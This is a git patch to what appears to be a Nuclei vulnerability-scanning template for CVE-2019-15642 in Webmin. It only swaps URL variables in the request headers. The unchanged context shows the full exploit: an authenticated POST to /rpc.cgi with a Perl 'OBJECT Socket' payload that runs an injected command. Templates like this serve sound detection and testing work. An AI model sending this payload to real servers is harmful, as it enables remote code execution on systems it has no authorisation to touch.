From e58f84bf60d50ed3e79ba47e328ba1a7680c630d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 10 Aug 2023 10:15:43 +0530 Subject: [PATCH] Update CVE-2019-15642.yaml --- http/cves/2019/CVE-2019-15642.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 3546f9d7b4..4521c08d85 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -24,9 +24,9 @@ http: POST /session_login.cgi HTTP/1.1 Host: {{Hostname}} Cookie: redirect=1; testing=1 - Origin: {{BaseURL}} + Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} + Referer: {{RootURL}} Accept-Encoding: gzip, deflate user={{username}}&pass={{password}} @@ -35,7 +35,7 @@ http: POST /rpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/sysinfo.cgi?xnavigation=1 + Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1 Accept-Encoding: gzip, deflate OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";